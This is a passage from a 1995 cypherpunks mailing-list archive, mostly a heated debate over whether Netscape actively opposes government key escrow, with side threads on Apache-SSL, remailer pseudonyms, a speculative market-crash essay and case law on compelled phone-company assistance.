> me of logical fallacies, but then argue through insult and assertion.

When the shoe fits....

> You have not pointed to a single fact or any contradictory statements
> in posts to this list.

Again, you have missed the target, and the barn.

I don't care about contradictory statements as much.  I care about a lack of 
demonstrated effort.  I have pointed to the absence of any single fact or 
statement that shows Netscape is really interested in trying to derail 
GAK, or promote strong crypto in anything like an active way.

> I will admit that Jim Clark was somewhat
> unclear, but I attribute this to the fact that the official company
> position is as yet not written and thus he is attempting to remain
> somewhat neutral.

And it is in my interest, and in my view everyone's interest, for him to 
be less than neutral, and instead quite violently pro-strong-crypto and 
anti-GAK.

It's called 'persuasion.'

> >> >I'd be interested to know what a 'government liaison person' is.  It 
> >> >sounds to me like an 'in house lobbyist.'  There is an old joke in the 
> >> >beltway about in house lobbyists.
> >> >
> >> >I also would like to know why you are actively lobbying for 
> >> >'clarification' rather than 'modification' of the current policy.

[Blah]

> >I believe you actually think you are teaching me something here.
> 
> You asked why they wanted clarification and I simply responded.

No, I asked why ONLY clarification, and NOT modification.  Try reading 
the entire sentence.

> >I said before, and I will say again.  If Netscape is against GAK, then 
> >let them be AGAINST GAK.  If they are just going to try and finesse their 
> >way into the market without making too many waves, let's hear it that way 
> >instead of some crap about how they are 'lobbying actively against GAK' 
> >(Which I might point out, is an assertion that fell apart at the most 
> >basic prodding).
> 
> Wait a week.

See above yet again why I would rather not.

> As far as their lobbying assertion falling apart, I must
> have missed this.  My understanding is that:
> 
> A)  They support several industry groups that are taking an active
> position in opposition to GAK.

"I'm all for those people who are for the troops in the gulf."

Lot of good this does.

> 
> B)  They have until very recently had only very limited resources.

My heart goes out.  Today they have resources, let's see some action.

> C)  Have just recently hired an in house lobbyist.

No, they have hired a 'government liaison person.'  No one has explained 
with any detail what that means.

> D)  That they did not attend the Bernstein hearing.

Perhaps, perhaps not.  I have no idea.

> Now given point B, I see no reason to expect that they would in the
> past have done much more than they have.

Netscape has been nicely funded for quite a while in Washington business 
days.  A lot happens there in the time they have been loafing.

> Given point C, I see they
> are currently expanding their lobbying.

Uh... sure... and 0 + 1 is still only 1.

Show me some serious effort.  Name this expert lobbyist who doubtlessly 
has a sparkling reputation.  Why was an individual and not a firm hired?

> If point D is the measure of
> crypto correctness, then I too am guilty.

Point D is of no real import to me.

> Though I do not live in the
> vicinity, I guess I should have been expected to fly up to lend my
> moral support.  Bovine excrement.

So.  We have one guy in Washington, (maybe, is he posted in Washington?) 
and a lot of excuses.

Adds up to:

"Bovine excrement."

> >> Also, lawyers usually advise clients based on a worst case scenario,

[Yadda yadda yadda]

> >I really think you are pompous enough to think you are teaching people 
> >things they don't know here.
> 
> Again, you asked, I answered.  I did not expect that this would be new
> to anyone on the list, but you asked.

I think you need to read questions more carefully.

> >I invite you to re-read the entire conversation and discover, as an 
> >exercise, that the issue is not what the government is or is not doing, 
> >but what Netscape is or is not doing.  I could care about Netscape's 
> >loose-lipped lawyers.
> 
> You seem very concerned about what Netscape is doing, and as such
> should be concerned about what their lawyers are _forced_ to tell
> them.

I am more concerned about what Netscape is NOT doing.  How this has 
anything to do with what the lawyers (none of whom to my knowledge are 
lobbyists) think?

> I understand that the discussion is about Netscape not the
> government, but discussing actions without discussing motives is
> useless.

A cute speech.  Still doesn't change the fact that a little fluff seems 
to have quite effectively taken you in.

> >> >
> >> >Netscape seems to be taking the position, "We'd love it if you'd let us 
> >> >do X, but we are happy to roll over for whatever."  and  "By the way, 
> >> >what is the rule on exporting software again?"
> >> >
> >> >I am impressed that some effort is being made.  I think it in the form of 
> >> >'too little, too late.'  But hey, who am I?
> >> 
> >> I think you are being too critical, they have done more than any
> >> company I know of to make easy to use crypto widely available.
> >
> >0 + .00001 = .00001
> >
> >Yes, just as last time you checked, .00001 is still more than 0.
> 
> My point is that you are too quick to call your recent ally an enemy.

Netscape was never my ally.  They looked like a company worth investing 
in.  For the time I held stock, they were.  Their morass on this issue, 
and my general dislike for overhyped firms, made the investment less and 
less worth it to me.

Netscape did about what was par for the course, include crypto in a 
product that is likely to be used for financial information.  You think 
this is some great accomplishment?

You only strengthen my view that you are easily impressed.

> You may not see what Netscape has done as important, but I believe
> that many do (including me).  They are supposed to have integrated
> e-mail crypto in the final release of Navigator 2.0.  I will remind
> you that Jeff Weinstein has said that this will not include GAK.

I don't CARE what Netscape's past is.  I care what Netscape is doing with 
the significant power and voice they have.  I wonder if Netscape is 
selling out.

> >> They
> >> may be willing to obey the laws if they require GAK, but I do not feel
> >> that they are just rolling over either.  I strongly oppose GAK, but I
> >> do not believe that no crypto is better than GAK crypto.  I would
> >> rather keep some people out than nobody out.
> >
> >Your ignorance is assuming that the options you present are the only 
> >options available.  JW made the same mistake.  In logical discourse this 
> >is called "narrowing the field."  It's a version of the 'straw man' 
> >and a classic flaw in logical argument.
> 
> I am not saying that the choice is between either no crypto or GAK
> crypto.

Now you need to read your answers more carefully.  Look up 11 lines.

> I am saying that they have only said that they will go to GAK
> if the choice is between GAK crypto and no crypto.

Read a few more lines up, where you say you don't think Netscape is 
rolling over.

> To the best of my
> knowledge they have not said that they would implement a GAK only
> product in any other situation.

In fact they have said very little of anything.  This is the point.


Again, what rises to the level of an 'anti-GAK' position in your view 
astounds me.  "Well, they didn't say they would implement GAK unless they 
had to."

"Well, I'll stop all this drug trafficking if anyone tells me I have to."

> I think that this is reasonable, I do
> not think that we should let it come to this.  We need to insure that
> they (or anyone else) are never put into that position.  (and yes they
> should too.)

Boy, sure seems like you're ready to come out swinging!  But let's wait a 
week, eh?

> >> Dan Weinstein
> >> djw@pdcorp.com
> >> http://www.earthlink.net/~danjw
> >> PGP public key is available from my Home Page.
> >> All opinions expressed above are mine.
> >> 
> >> "I understand by 'freedom of Spirit' something quite definite -
> >> the unconditional will to say No, where it is dangerous to say
> >> No.    
> >
> >This has got to be the most ironic of signatures I have ever seen.
> >
> >Why don't you begin to apply the cute quotes you put in your .sig to real 
> >life and tell Netscape to grow a backbone and say 'No.' to GAK?
> 
> I sent a message to Netscape after reading the article that started
> this,  It simply stated that I wanted clarification on their position
> on GAK and that if they were to support it they would lose a loyal
> customer.  I have since been convinced by Jeff Weinstein's posts to
> this list that the company does not support GAK, and in fact they
> oppose it.

And what have they done to oppose it precisely?  Show me something 
besides 'send a man down' or 'appoint a committee' or 'consider the issue 
for a pending policy release.'

> You would do better to spend less time insulting people
> and more time trying to support your arguments.

And you need to read questions and your own statements before starting 
a reply.

> 
> Dan Weinstein
> djw@pdcorp.com
> http://www.earthlink.net/~danjw
> PGP public key is available from my Home Page.
> All opinions expressed above are mine.

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 16:14:43 PST
To: cypherpunks@toad.com
Subject: apachessl info
Message-ID: <199512040015.BAA22063@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"James A. Donald" <jamesd@echeque.com> wrote:
>>At 11:32 PM 12/2/95 -0800, sameer wrote:
>>       I hate to repeat myself, but sometimes people don't listen.
>>http://www.c2.org/apachessl/

>This Web page fails to explain what Apache-SSL actually is, what it is good
>for, and why people should use it.

What I missed was the how-to on getting a certified key. Wasn't there a way
of doing that through e-world (Apple's on-line service) for free?

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 95 17:10:33 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
In-Reply-To: <199512032055.VAA13990@utopia.hacktic.nl>
Message-ID: <30c24a22.19293808@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 21:55:09 +0100, you wrote:

>Alex Strasheim:
>
>>  >       1     Make illegal software available by FTP
>>  >       2     Explain it's doing so because ITAR is bullshit
>>  >       3     Face the gov't down in the press and in the courts 
>>  
>>  Go for it.  We're behind you 100%.
>
>      If I were worth billions, if I were the sparkle on the high-tech
>bubble, if I had a Major hand in engineering crucial protocols, if my
>company were so young that it hadn't yet had time to bog down in business
>as usual, I think I probably would. That's a lot of Big talk and a lot of
>Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else --
>would give as much to my LDF as I gave to his (chump change, but more than
>I could afford).
>      Clark should ask himself what Rabbi Akiva put best: 
>
>      If not me, who?
>      If not now, when?
>
>      I do my small part, in my small way; he can do his big part, in his
>big way. One thing scares the spooks more than what they oppose:
>publicity.

You have just proven yourself to be a hypocrite.  If you expect of
others more than you expect of yourself, you need to reevaluate your
own life.  If you are not willing to risk your life, fortune, and
reputation on your beliefs, how can you expect Mr. Clark or anyone
else to do the same?
 

Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 01:43:08 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512040942.BAA22190@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:


> Netscape, being the dominant browser company, and Microsoft, being the
> dominant OS company, are in special positions to "build in Big Brother."
> I'm not claiming they are, just that they are clearly in a position to make
> it technologically more feasible to make non-GAK illegal. They both need to
> carefully think about the role that's been "given" to them (whether by
> fortune, hard work, or being in the right place at the right time) and do
> what's right.

That's always a tough position to be in.  If Netscape or Microsoft
knew what was the "right" thing to do, I don't doubt that they'd be
doing it.

The problem is always that there is no crystal clear "right" answer
on lots of these issues.  Everything is always "fuzzy" because of the
possible consequence that flows from action.

> Strong words, perhaps, but the implications of mandatory key escrow are
> quite clear. We debated these points for a long time during the Clipper
> debate, and later when "Software Key Escrow" began to rear its head. I
> won't repeat these arguments against GAK here, but will take this
> opportunity to quote from a new book that actually quotes my words:

Good quote, Tim.  

I'll lift a glass of eggnog at the end of the "open door policy" as
well.  It really doesn't serve anyone's interests at all.  My concern
is the policy wind-down challenge.  It can call for a real strong
stomach sometimes, as Greenspan could probably attest.  

It probably shouldn't be embraced except by the most foolish of fools.

> And time is of the essence. Things move very fast. It is no longer the case
> that a law is passed, then companies respond to the new legal regime with
> their own policies and products. Companies, especially in high tech, are
> "partners" from the start, as we saw with the Clipper development (where
> AT&T had known about Clipper for years prior to the first public
> announcement, and was cooperating in the development of it, not to mention
> the other companies such as Mykotronx, VLSI Technology, etc., which were
> involved in secret for years).

Sure, this isn't news to anyone.  Time is now compressed.

There usually has to be some lead time to these things.  AT&T as an
example has been well rewarded -- in fact, some circles might suggest
that they were overly well-rewarded -- when they got a $1 Billion plus
preferential contract in the Middle East (Bahrain, if memory serves ...)
following Desert Storm.

Does this then mean that anyone should be surprised with Thomson-CSF's
alternate means against Raytheon?  Not this cowboy.  

We're into a completely different altitude of engagement here.
Completely different.  And in this case, we not only face an enemy,
but we're surrounded with civilians who can get caught in the
cross-fire.  No different than the orphans who were used as human
shields in Bosnia.

These companies generally need to be briefed early on what the action
plan will be and on the possible range of consequences and the
attendant probabilities so that proper contingencies can be drawn up.
Unless of course, these companies are actually your adversary, while
posing as your friend, in which case it's best to keep them out of the
loop altogether.  

Probably best just to amuse them, as you do a child in a crib, while
you go about your affairs.

> It is only sheer speculation on our part (some of us, at least) that
> negotiations about GAK have been going on with the major software
> companies. Jim Clark, for example, learned what he knows about key escrow
> _someplace_, and it probably wasn't from our list or from articles he'd
> read. I'm betting, but could of course be wrong, that he and other folks at
> Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
> been briefed on key escrow and that various negotiations are already
> underway. This would match how things were done with Clipper, and would
> explain Clark's voiced support for the need for GAK.

Clark's voiced support for GAK is one of the most insane ideas I have
come across.  Does he have any idea of what he is tinkering with?
Does he know how to play his tune of Tommy the Tinkerer??

Somehow, I have doubts.  Serious doubts.

His GAK comments could trigger a very nice cascade throughout the
entire high-tech sector which could spill over and out.  "Friendly
Fire" could be deadly to some American financial powerhouses.  Not
only could Jim throw a monkey-wrench into the exit-strategies of
valley venture-capitalists, but this whole scenario could well 
spill into other issuers if he's not careful.

To understand, the market truly is not looking at Netscape as a
"software" play.  It is the quintessential Internet play -- a whole
"new" economic sector.  

The sector which many Dow firms (IBM, AT&T, and Disney) hope to
exploit as part of their mid to long-term business plans. Future 
earnings forecasts and indeed valuations up and down the street
are based around the assumption of Internet success.  Jim is playing
with fire, if the audience he's _hoping_ to address isn't listening to
him while _another_ audience in fact is.

Anyone who doubts this, or thinks that the markets aren't particularly
vulnerable and sensitive, shouldn't listen to me -- who am i -- they
should listen instead to the true "professionals".  

Here's what Doug Casey, an investment adviser out of Baltimore is
writing:

    "We're at the tail end of one of the great manias of history,
    where value is thrown totally to the wind and everybody with two
    nickels to rub together plans on making a million with mutual
    funds.  I sincerely hope that all the best happens and the market
    goes to 10,000.  But I'm not planning on joining the party.  Since
    May, 1985, when the mutual fund assets market reached a $100
    Billion (US), asset growth has gone hyperbolic.  Half of all the
    money in equity funds has come in during the last TWO years.  It's
    a mania of historic proportions.  It's completely and totally
    insane."

I might go one step further, and ask the thorny question of how much
of that recent mutual fund investment -- the "hot money" that's come
in over the last two years -- is actually "leveraged money".  How much
of it is borrowed funds?  Probably a pretty fair chunk.

Then I might ask how many of these casino bets, are with money that
people truly can't afford to lose.  How many IRA's or college funds
are invested either directly or indirectly in Spyglass, or some other
darling??  Instead of prudent "blue-chip" stuff, that couldn't
*possibly* ever take a big hit -- parts of the Dow Industrials -- like
AT&T or Disney??  Again, probably a fair chunk.

Let's suppose that as a result of Jim's GAK comments, people lose
faith and ask to redeem their mutuals.  What's the cash-position of
these funds?  Do they have the liquidity to meet the redemptions or
will they have to engage in selling wave after selling wave -- selling 
everything regardless of "fundamentals"?  And then will the across
the board selling cause ever more redemptions as hopes and dreams 
fade and as reality sets in?

Maybe, I'll help answer that question, by quoting analyst, Leo Hood,
from Gainesville Florida, who spoke of some of the risks and attempted 
to debunk the perceived "safeguards" when he wrote:

     "One by one, investors have moved their money out of conservative
     investments and into growth funds and high-tech stocks.  Many
     feel this concentration of power in the hands of a few is a
     safeguard against a horde of small investors selling all at
     once.  I think the opposite is true.  With funds down to very low
     cash levels, a panic by individuals is likely to make matters
     worse."

Hood is correct in this case, about the present state of mutual fund
liquidity.  It's next to non-existent.  And Hood raises another market
vector to contend with.  The so-called "safeguard" no longer resides
in broadly distributed wetware.  Instead, everything is auto-pilot.

The safeguard -- Mr. "Safeguard" Circuit-breaker investment fund
manager -- can't default on a client redemption.  If he doesn't have
cash in the bank, he has no option but to raise cash by selling.

In fact, he might not even have the authority or discretion to
determine what he'll sell.  He might be forced to follow the
Investment Committee's guidelines and formulae.  He might even try to
play hero, and over-sell near the perceived market "top" to meet his
anticipated future redemptions, and "beat the market", so that he and
his fund have claim to future "bragging rights".

Seeds for an anticipatory meltdown??

Possibly.

In addition to the historic mania for mutual funds, Alan Newman from
Great Neck, New York tries to help out and give us some historical
perspective on where our market sits, historically.  He looks back
many years and writes:

     "The dollar value of all U.S. stocks now amounts to 85.9 per-cent
     of nominal GNP -- far and away the highest such reading of all
     time.  Prior peaks in August 1929 at 77.4 per-cent, December 1968
     at 79.3 per-cent and December 1972 at 80 per-cent were all
     followed by brutal bear markets that lopped off at least 21
     percent in value over the next twelve months.  Two of these
     times, 1929 and 1973-74 -- marked the start of the two worst bear
     markets of the century."

To understand and give Alan's words some context, especially his
observation that these nosebleed valuation levels were invariably
followed by spectacular historic corrections, let's remember that
his data reflected old fundamentals.  The old-style market.

This is not '29 nor '73-74.  Back then, we didn't have the compressed
ultra-sensitive global market we now face, where a sneeze turns into
an earthquake.

We also didn't use the complex financial instruments (many of which
are off-balance sheet) like we now do.  And we didn't have duelling
neural nets in charge of trading. 

The seasoned professionals with the experience and human reason and
judgment to manage these events are gone.  The ones who had the
authority in the past to exercise their "judgment" in managing new
"unlearned" events have had all of their authority stripped from them.

That authority now sits in other hands.  In silicon.

During '29 and 73-74, the markets certainly weren't facing the type
of optimism that we're facing today ... (well maybe, in '29 they
were.)  An optimism which has been fuelled by the media.  Including
such memorables as the Rolling Stones "Start me up" which I've heard 
hummed in elevators.  They weren't facing the "News" on the front
page of every major periodical and the near constant bombardment on
the "Internet".

And no one need mention that nifty icon in the corner of every
computer screen.  The coverage has set individual expectations to
unattainable levels.

All of the above, might well come together to form a "series of
factors" which act serially -- factors which will magnify 
market swings.

If all of this hasn't helped convince Jim, perhaps Paul Franke from
Kansas City might shed some additional illumination on the present 
situation.  Some recent history.

He tried to look at the current market within a narrower time frame
than Alan Newman's long-term historical.  He wanted to give some
current (twelve-month) context for our consideration.  He wrote:

     "In late 1994, skepticism and pessimism among investors were very
     high.  Mutual funds had cash levels of close to 10 per-cent.
     Some 60 per-cent of investment advisers were staunchly bearish.
     Interest rates were high after rising all year.  Inflation seemed
     to be picking up steam.  Today, the stock market is in the
     opposite position it was a year ago.  Futures traders are more
     bullish than they have been in several years, and mutual fund
     cash levels have fallen to near a record low.  Cautioning
     investors to watch their step may prove to be an understatement."

Some very good advice there from Kansas City about watching your step.


We have many other vectors to consider.  One, is the manner in which
mutual funds report unit-holder value.  Mutual funds do not present
and publish a "real-time" value.  The reported NPV lags the
calculation.  The value most people see published and what they will
react to, is not actually where "it is" -- it's actually where "it was".

This information "air-gap" will tend to make the unit-holder reaction
time much longer and will tend to continue and give life to negative
news, as well as presenting exploitation opportunities to market
professionals who have an information advantage.

Domestic and International Pros will use this "feature" to calculate
and approximate the reported unit-holder value before the report hits 
the press.  On the basis of educated "guesses", they will likely trade 
through overnight or international markets to pre-position themselves 
prior to the general release of mutual fund values to the American 
public, again magnifying the raid.

This combined interplay -- between the public and the professional --
would respectively extend the reaction period and, magnify intra-day
market movements.  Or in plain English, it would last longer and be
more volatile.  Or much more succinctly, as Irwin Yamamoto said,
"_Mutual Funds_ will be an obscene expression."

The full impact would of course require a full analysis and model of
another vector, that of the entire futures market and that of
international arbitrageurs.  When they smell blood, they tend to
behave as piranha.  Arbs and "vulture funds" have the resources --
personnel resources as well as procedural resources to preferentially
position themselves such that they have an advantage of trading
execution and a preferential view of how market buy/sell orders flow
into the theatre of the exchange.  

Both professional types are prepared at a moment's notice to jump in
or refrain.  They can assess track records, determine
capitalizations, psychoanalyze the personalities of everyone involved
and phone everyone in their Rolodex looking for some clue and subtlety
to play.

(Arbs not only have Breaking News Co-ordinators but are also privy to
particular intelligence.  They recall how the market-makers took it on
the chin in '87 and had to go to the window.  Many market-makers made
great sacrifices in attempts to maintain order during '87.  A
sacrifice they may not willingly make to ensure system-liquidity now.)

All of these factors (and many more) will tend to interplay in one big
international soup.

Clearly, Jim is not only in position to influence the future of GAK,
but he could cause a great deal of trouble throughout the chain of the
US financial system.  The market does not need a jittery Chairman,
going on about GAK.  No one is served by this type of play.

I doubt the President wants a market meltdown as we start to move
towards an election year.  Body bags and a bad economic front are a
bad mix and could swing the whole election with the dual near 
unsurmountable election obstacles.  Then again, Bob Dole probably 
wouldn't want to take hold of the Presidential reins in that 
environment, either.

As an endnote to something that really wasn't relevant to Jim's GAK
comments, something which veered off and almost assumed a life of its
own, I'd say that the probability of the foregoing is certainly in
excess of one chance in ten.

> I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
> high for product decisions to be made without full awareness of the
> implications. 

Yep, we're in "the shit" as they say.  

> The statements from Jim Clark do tend to imply a kind of
> defeatism, and even Jeff's comments seemed laden with qualifications about
> "only if the government requires us to." As Hal Finney noted in his post,
> it's as if the Netscape people are preparing for the inevitable. Maybe it's
> not an indication that GAK is being considered within Netscape, but maybe
> it is. After all, one rarely hears "only if we have to" qualifications on
> things that are truly from out in left field.

Preparation can be a good thing.

I still think that coming out and saying what is being said, is risky
business.  It is a comment out of left field.  But then I'm not privy
to all the variables either, so take my comments with a grain of salt.

> (A side point, somewhat abstract: The dominance of Netscape, rising from
> nowhere to becoming the major player in this debate, illustrates a point
> about "monocultures" and their ecological effects. If yellow corn is good,
> replace other strains of corn with yellow corn. Pretty soon, the world's
> corn output is 96% yellow corn. Some ecological downsides to this. In this
> case, Netscape is becoming the yellow corn of the Web, and an obvious
> "choke point" for the NSA and its sisters to mandate crypto policies.
> Hence, the role of non-yellow-corn alternatives...)

Yep Tim, I'll agree with you on this. 

I think Maurice Strong has also been saying something along these lines 
for some time.  Warning about systems and monocultures.  Sadly,
monocultures can develop without our even seeing it.  Or at least, I
think Maurice has been saying something along those lines in his own
fashion.

> And what Netscape agrees to put in future releases of its browsers or its
> servers could have dramatic effects on the whole climate.

Sure.  Just like Christmas in Bosnia will, undoubtedly.

'Tis the season ...

Hopefully, god-willing, we won't face any tragedies.




Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 23:32:40 PST
To: blancw@accessone.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <9512040703.AA14762@pulm1.accessone.com>
Message-ID: <Pine.SUN.3.91.951204023207.24617A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 blancw@accessone.com wrote:

> 
> Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why 
> don't you write to Jim Clark yourself and tell him about his spinelessness and 
> all your other opinions of him, his unacceptable attitude, and his worthless 
> company, instead of getting granular with Jim and Dan here on the list?
> 
> After all, Jim Clark is the one who made the unpleasant statements.
> 
>   ..
> Blanc
> 

I would hope that others might recognize the trend in Netscape and work 
to act as I have.

I have written Mr. Clark.

> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Mon, 4 Dec 95 02:29:17 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
In-Reply-To: <Pine.LNX.3.91.951203113046.13147B-100000@micro.internexus.net>
Message-ID: <ML-2.0.818072907.7349.don@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Someone posing as Alice said:
> As I promised, I've now opened a channel so that anyone who wants to
> can send Alice de 'nonymous email.  I can now be reached via
> an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> address will get to me, and I will do my best to reply to you as well,
> but I can't guarantee, anything.

Laszlo Vecsey <master@internexus.net> said:

> I don't think that was a smart thing to do. Your real email is now 
> registered in some database in Finland - how difficult would it be to 
> retrieve it? From what I remember organizations like Scientology had no 

Not _nearly_ as hard as breaking/finding an appropriately encrypted key.

I for one am not going to even bother with the penet address unless the
posts come from there. After all, it's a forgery anyway. The real Alice
already posted a PGP key. I wouldn't be reading this list if I were
going to fall over for a simple impersonation.

Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think-
of-everything-but-a-packet-sniffer Alice were to post from penet,
then everyone (including procmail ;) would have to believe his claims
of pseudo-identity.

I must say, L.D. is really falling all over himself this time. Maybe
he's just trying to make people *think* he's a cryptobungler, so that he
can keep his other tentacles with whom he converses out of suspicion.

Don

Wishing Emacs had IMAP support cuz here comes mailcrypt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 4 Dec 95 00:43:07 PST
To: cypherpunks@toad.com
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <Pine.BSD.3.91.951204032704.13763G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
12 03 95 Edupage reports: 
 
 
SUN PLANS JAVA-LIKE MICROKERNEL
 
Sun Microsystems is already working on a microkernel-like operating 
system to run low-tech "Internet appliances."  Dubbed Java OS, Sun's 
chief technical officer Eric Schmidt calls it the "natural next step" 
for Java.
 
The new software will "take the Java classes and put them on the minimum
OS functionality you need.  You can add additional functionality 
by writing in Java," he says.  It will require only 4 to 8 Mbytes of 
memory, and will not support Windows applications or other programs 
that make large demands on system memory. 
 
"This thing doesn't come with Sound Blaster and speakers.  If you need 
a PC, buy a PC," says Schmidt. 
 
                                     (Information Week 4 Dec 95 p104) 
 
 
The condescending tone illustrates the points made by wfgodot@iquest.com 
on 11 30 95: 
 
 It seems that many corporate types are fixated on the idea of tractable
 and predictable consumers. 
 
 [snip] 
 
 The approach to understanding the actual dynamics of why people are and
 will increasingly come into this space and what they will want to do
 once they get there is deficient for many. 
 
 [snip] 
 
 Others are puzzled, or are overtly threatened by the idea of potential 
 consumers who are also content producers. 
 
 
Cordially, 
 
Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 18:34:36 PST
To: cypherpunks@toad.com
Subject: Re: info?
Message-ID: <199512040235.DAA29635@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Dec 95 at 22:28, j.miranda3@genie.com wrote:

> Can you send me information about your organization?
> 
>  --Joseph Miranda

Sure, Joe! We were founded several thousand years ago, have had chapters in virtually all societies and cultures beyond the truly primitive ones. Some of our members founded the United States of America some time back -- maybe you've heard of it? We have initiation rites that often involve learning arcane and complex formulae from thick books, we have secret handshakes, decoder rings, and we often like to roast our victims over a slow fire. There's hardly anything that goes on in the world that our members don't affect, and still, the society at large doesn't really know we're here. If you're looking for a secret cabal well, gee, you've come to the right place!

If you'd like an interesting and colorful brochure containing all the details and benefits of membership, just pick up the phone, call your mother, and ask for one!

Thank you for inquiring about the International Gourmet Cooking Society!

Salsa Sam










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 18:39:24 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
Message-ID: <199512040239.DAA29711@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dan Weinstein:

>You have just proven yourself to be a hypocrite.  If you expect of
>others more than you expect of yourself, you need to reevaluate your
>own life.  If you are not willing to risk your life, fortune, and
>reputation on your beliefs, how can you expect Mr. Clark or anyone
>else to do the same.

      And you've just proven yourself to be "a little bit slow";
hypocrites, at least, can change their ways. This discussion is about the
effects that Jim Clark, someone who is assessed as a billionaire and who
heads a Wall St.-bedazzling multibillion-dollar corporation, can have on
USG crypto policy; yet you would get into a tawdry comparison of "personal
failings." I will continue not to trumpet the specifics of any
crypto-promoting illegalities which I may or may not have engaged in, and
I'll thank you to do the same.

Hieronymous

>"I understand by 'freedom of Spirit' something quite definite -
>the unconditional will to say No, where it is dangerous to say
>No.        
>           Friedrich Nietzsche

      BU was right: there's gotta be a self-help book called something
like "Learning to Say YES!" that would provide you with a more appropriate
.sig.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMJeX73g0mNE55u1AQEiqAH+IXva02/4rIoegkaQEUzF9X/2nTQhGKFm
TEO6RjrN1vuegeUtBs3oNfvs4bq6Rxrnras+9EJfVCaxZam51dWDRQ==
=pRWz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 4 Dec 95 04:03:17 PST
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: "Got a subpoena?"
In-Reply-To: <Pine.BSF.3.91.951201171205.5743A-100000@mercury.thepoint.net>
Message-ID: <199512041148.AA10690@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis writes:

> On Thu, 30 Nov 1995, sameer wrote:

> > > What about a court order to (a) start comprehensive logging, and (b) not
> > > tell anyone under penalty of ______ .

> I am unaware of any authority for such an order.

This evening I ran across _In Re Application of United States of America for
Order Authorizing Installation of Pen Register_ 610 F.2d 1148 (3rd Cir., 1979),
citing to _United States v. New York Tel. Co._ 434 US 149, 54 L.Ed.2d 376,
98 S.Ct. 364 (1977), holding that Fed.R.Crim.P. 41 and the All Writs Act
28 USC 1651 give a federal district court the power to direct a telephone
company to make equipment and personnel available to assist in gathering
evidence and intelligence as part of a criminal investigation. (Also see
58 ALR Fed 719 "Authority of District Court to order telephone company to
assist law enforcement agents in tracing telephone calls", and _Michigan
Bell Tel. Co. v. United States_ 565 F.2d 385 (6th Cir., 1977).)

I don't get much exposure to federal criminal law so I'm way out of my depth
re whether that interpretation of rule 41 is current (or if rule 41 has changed
in the intervening 20 years) but it might be a starting place. The cases
discuss the telephone companies' status as "highly regulated utilities with
a duty to serve the public" as justifying a diminished interest in autonomy;
presumably this factor would work against the commandeering of a remailer.
